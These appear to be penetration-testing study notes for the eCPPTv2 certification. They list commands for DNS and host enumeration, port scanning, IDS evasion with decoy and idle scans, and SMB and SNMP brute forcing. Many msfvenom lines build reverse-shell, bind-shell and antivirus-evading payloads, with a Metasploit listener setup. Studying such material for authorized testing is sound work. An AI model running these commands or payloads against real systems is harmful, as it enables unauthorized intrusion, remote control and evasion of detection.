eCPPTv2 Notes
whois <domain>
whois -h <server> <domain>
nslookup <target>
nslookup -query=mx <domain>
nslookup -query=ns <domain>
nslookup -query=any <domain>
dig +nocmd <domain> MX +noall +answer
dig +nocmd <domain> A +noall +answer
dig +nocmd <domain> NS +noall +answer
dig +nocmd axfr <@name_server> <domain> +noall +answer
fierce -dns <domain> --dnsserver <server>
dnsmap <domain>
dnsrecon -d <domain>
dnsenum <domain>
nmap -sn <target> --disable-arp-ping
nmap -sn -PS <target> --disable-arp-ping
nmap -sn -PA <target> --disable-arp-ping
nmap -sn -PE <target> --disable-arp-ping
fping -A <target>
Send ICMP echo request packets and only display hosts that are alive and specify the number of retries (-r):
fping -A <target> -r <number of retries>
Specify a range of ip addresses such as a whole subnet (-g), send ICMP packets to every host in subnet, display time required to reach host (-e) and force fping to be quiet (-q):
fping -q -a -g <target> <subnet to scan> -r 0 -e
hping3 -S -p <port> <target>
hping3 -S --scan 1-1000 <target>
hping3 -S --scan all <target>
hping3 -S --scan 80,445,53,21 <target>
nmap -sS <target>
nmap -sS <target> -n -Pn
nmap -sT <target> -F
nmap -sU <target>
nmap -sN <target>
nmap -sX <target>
nmap -sF <target>
/usr/share/nmap/scripts/
nmap -c
nmap --script
nmap --script-updatedb
nmap --script-help “smb*” and discovery
nmap --script whois-domain <website> -sn
nmap --script smb-os-discovery -p 445 <target>
nmap --script smb-enum-shares <target> -p 445
nmap --script auth <target>
Idle scan is stealthy because the target host will never know the real attacker's ip
hping3 -S -r -p <port> <zombie_ip>
hping3 -a <zombie_ip> -S -p <dst_port> <target>
nmap --script ipidseq <target> -p <port>
nmap -Pn -sI -p <dst_port> <zombie_ip>:<src_port> <target>
nmap -f <target> -n --disable-arp-ping -Pn
nmap -sS -f <target>
nmap -p <port> -D <decoy1,ME,decoy2,etc..> <target>
nmap -D RND:10 <target> -sS -p <port> -Pn --disable-arp-ping
nmap --source-port 53 <target> -sS
hping3 -S -s 53 --scan known <target>
nmap --spoof-mac <choose vendor MAC i.e. Apple or Intel etc..> <target> -p <port> -Pn --disable-arp-ping -n
nmap --spoof-mac 0 <target> -p <port> -Pn --disable-arp-ping -n
nmap -iL hosts.list -sS -p <port> --randomize-hosts -T 2
hping3 -a <alive host on network> -S -p <port> <target>
nmap -sS --data-length 10 -p 21 <target>
nmap -sS -p 135 <target>
nbtscan -v <target>
nmblookup -A <target>
smbclient -L <target>
enum4linux -a <target>
smbclient \\\\<target>\\<share> -N
rpcclient -N -U "" <target>
nmap --script=smb-brute <target>
snmpwalk -c <c_string> -v <version> <target>
nmap -sU -p 161 --script=snmp-brute <target>
nmap -sU -p 161 --script snmp-win32-users <target>
ls -l /usr/share/nmap/script | grep -i snmp
snmpwalk -c <c_string> -v <version> <target> <OID>
snmpset -c <c_string> -v <version> <target> <OID> <value_type> <value>
echo public > community
echo private >> community
echo manager >> community
onesixtyone -c community <target>
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.1.6.0
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.4.2.1.4
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.2.3.1.4
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.25.6.3.1.2
snmpwalk -c <community string> -<version> <target> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c <community string> -<version> <target> 1.3.6.1.2.1.6.13.1.3
msfvenom -l
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run
ip.addr==<ip>
ip.src==<ip>
ip.dst==<ip>
http.request.method == POST
arp
http
icmp
http or dns
ip.addr==<ip> and (dns or http)
http and ip.src!=<ip>
tcp.port==<port>
udp.port==<port>
tcp.flags.syn==1
tcp.flags.syn==1 and tcp.flags.ack==1
tcp.flags.syn==1 and tcp.flags.ack==1 and ip.addr==192.168.1.0/24
tcp contains "string"